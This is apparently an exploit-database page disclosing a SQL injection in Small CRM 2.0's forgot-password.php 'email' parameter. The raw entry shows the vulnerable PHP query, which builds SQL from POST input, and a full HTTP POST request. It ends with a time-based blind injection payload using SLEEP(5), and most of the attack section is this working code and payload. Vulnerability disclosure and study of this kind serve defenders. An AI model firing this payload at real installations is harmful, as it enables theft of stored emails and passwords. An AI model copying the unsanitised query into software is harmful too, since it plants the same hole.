header-logo
Suggest Exploit
vendor:
Small CRM
by:
Ahmet Ümit BAYRAM
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Small CRM
Affected Version From: V2.0
Affected Version To: V2.0
Patch Exists: NO
Related CWE: N/A
CPE: a:phpgurukul:small_crm:2.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
2020

Small CRM 2.0 – ’email’ SQL Injection

Small CRM 2.0 is vulnerable to SQL Injection in the 'email' parameter of the forgot-password.php page. An attacker can exploit this vulnerability by sending a specially crafted payload to the vulnerable parameter. This can allow the attacker to gain access to the database and execute arbitrary SQL commands.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

# Exploit Title: Small CRM 2.0 - 'email' SQL Injection
# Google Dork: N/A
# Date: 2020-10-10
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/small-crm-php/
# Version: V2.0
# Tested on: Kali Linux
# CVE : N/A

========== Vulnerable Code ==========

mysqli_query $row1 = mysqli_query($con, "select email,password from user
where email='" . $_POST['email'] . "'");  // dbconnection.php

========== Post Request ====================

POST /crm/forgot-password.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: localhost/crm/forgot-password.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 20
Connection: close
Cookie: __test=ec283e73906679549573af64209a5d5b;
PHPSESSID=4d272f5938b3ec9c60bb45c4d7b44497
Upgrade-Insecure-Requests: 1

email=test@test.com&submit=

============= Vulnerable Parameter ===============

email (POST)

============= Payload  =========================

' AND (SELECT 1543 FROM (SELECT(SLEEP(5)))gSRd) AND 'PCOX'='PCOX

Navigation

Suggest Exploit

Services By CQR